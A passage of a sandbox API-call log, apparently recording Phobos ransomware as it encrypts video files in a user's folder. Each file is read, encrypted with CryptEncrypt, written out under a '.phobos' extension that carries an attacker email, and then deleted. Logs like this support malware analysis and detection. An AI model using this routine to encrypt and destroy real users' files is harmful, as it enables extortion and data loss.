(in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=45789) returned 1 [0199.424] CloseHandle (hObject=0x174) returned 1 [0199.424] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6c2UZa.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6c2uza.mkv")) returned 0x20 [0199.424] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6c2UZa.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6c2uza.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6c2UZa.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6c2uza.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.424] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.424] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6c2UZa.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6c2uza.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.425] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.425] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.425] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb2dd, lpOverlapped=0x0) returned 1 [0199.426] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb2e0, dwBufLen=0xb2e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xb2e0) returned 1 [0199.427] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xb2e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xb2e0, lpOverlapped=0x0) returned 1 [0199.428] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0199.428] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.428] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.428] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.428] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.428] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.428] CloseHandle (hObject=0x174) returned 1 [0199.428] CloseHandle (hObject=0x140) returned 1 [0199.428] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6c2UZa.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6c2uza.mkv")) returned 1 [0199.430] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\aFqKPe5P9o.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\afqkpe5p9o.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.430] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=69300) returned 1 [0199.430] CloseHandle (hObject=0x140) returned 1 [0199.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\aFqKPe5P9o.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\afqkpe5p9o.avi")) returned 0x20 [0199.431] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\aFqKPe5P9o.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\afqkpe5p9o.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\aFqKPe5P9o.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\afqkpe5p9o.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.431] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.431] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\aFqKPe5P9o.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\afqkpe5p9o.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.432] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.432] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.432] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10eb4, lpOverlapped=0x0) returned 1 [0199.433] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10ec0, dwBufLen=0x10ec0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10ec0) returned 1 [0199.434] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10ec0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10ec0, lpOverlapped=0x0) returned 1 [0199.435] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0199.435] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.435] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.435] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.435] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.436] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.436] CloseHandle (hObject=0x140) returned 1 [0199.436] CloseHandle (hObject=0x174) returned 1 [0199.436] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\aFqKPe5P9o.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\afqkpe5p9o.avi")) returned 1 [0199.437] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\C_yT7EtBELGkVDFo4.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\c_yt7etbelgkvdfo4.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.441] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=5799) returned 1 [0199.441] CloseHandle (hObject=0x174) returned 1 [0199.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\C_yT7EtBELGkVDFo4.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\c_yt7etbelgkvdfo4.avi")) returned 0x20 [0199.441] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\C_yT7EtBELGkVDFo4.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\c_yt7etbelgkvdfo4.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\C_yT7EtBELGkVDFo4.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\c_yt7etbelgkvdfo4.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.441] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.441] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\C_yT7EtBELGkVDFo4.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\c_yt7etbelgkvdfo4.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.442] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.442] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.442] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x16a7, lpOverlapped=0x0) returned 1 [0199.444] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x16b0, dwBufLen=0x16b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x16b0) returned 1 [0199.444] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x16b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x16b0, lpOverlapped=0x0) returned 1 [0199.445] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0199.445] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.445] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0199.445] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.445] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0199.445] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.445] CloseHandle (hObject=0x174) returned 1 [0199.445] CloseHandle (hObject=0x140) returned 1 [0199.445] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\C_yT7EtBELGkVDFo4.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\c_yt7etbelgkvdfo4.avi")) returned 1 [0199.446] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\i0q0D553GbO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\i0q0d553gbo.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.447] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=3306) returned 1 [0199.447] CloseHandle (hObject=0x140) returned 1 [0199.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\i0q0D553GbO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\i0q0d553gbo.mkv")) returned 0x20 [0199.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\i0q0D553GbO.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\i0q0d553gbo.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\i0q0D553GbO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\i0q0d553gbo.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.447] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.447] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\i0q0D553GbO.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\i0q0d553gbo.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.448] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.448] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.448] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xcea, lpOverlapped=0x0) returned 1 [0199.449] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xcf0, dwBufLen=0xcf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xcf0) returned 1 [0199.449] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xcf0, lpOverlapped=0x0) returned 1 [0199.450] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0199.450] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.450] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.450] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.450] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.450] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.450] CloseHandle (hObject=0x140) returned 1 [0199.450] CloseHandle (hObject=0x174) returned 1 [0199.450] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\i0q0D553GbO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\i0q0d553gbo.mkv")) returned 1 [0199.451] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\KDpI.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\kdpi.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.452] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=64988) returned 1 [0199.452] CloseHandle (hObject=0x174) returned 1 [0199.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\KDpI.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\kdpi.mkv")) returned 0x20 [0199.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\KDpI.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\kdpi.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\KDpI.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\kdpi.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.452] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.452] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\KDpI.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\kdpi.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.453] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0199.453] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.453] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xfddc, lpOverlapped=0x0) returned 1 [0199.601] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xfde0, dwBufLen=0xfde0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xfde0) returned 1 [0199.601] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xfde0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xfde0, lpOverlapped=0x0) returned 1 [0199.603] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32b68) returned 1 [0199.603] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0199.603] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0199.603] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.603] WriteFile (in: hFile=0x140, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0199.603] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.603] CloseHandle (hObject=0x174) returned 1 [0199.603] CloseHandle (hObject=0x140) returned 1 [0199.603] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\KDpI.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\kdpi.mkv")) returned 1 [0199.605] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0199.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\zjnsr5Ur.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\zjnsr5ur.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.605] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=24125) returned 1 [0199.605] CloseHandle (hObject=0x140) returned 1 [0199.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\zjnsr5Ur.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\zjnsr5ur.swf")) returned 0x20 [0199.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\zjnsr5Ur.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\zjnsr5ur.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\zjnsr5Ur.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\zjnsr5ur.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.606] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.606] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0199.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 